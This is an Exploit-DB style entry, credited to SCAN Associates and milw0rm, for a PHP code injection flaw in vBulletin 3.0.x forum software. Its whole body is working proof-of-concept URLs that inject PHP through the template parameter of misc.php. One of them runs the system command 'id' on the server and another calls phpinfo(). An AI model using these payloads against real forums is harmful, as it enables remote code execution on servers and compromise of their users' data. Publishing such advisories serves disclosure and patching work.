vBulletin 3.0.6 - PHP Code Injection

EDB-ID:

832

Author:

pokley

Type:

webapps

Platform:

PHP

Published:

2005-02-22

# Tested on vBulletin Version 3.0.1 /str0ke 
# http://www.xxx.net/misc.php?do=page&template={${system(id)}} 
#

# [SCAN Associates Security Advisory]
# http://www.scan-associates.net

Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}

# milw0rm.com [2005-02-22]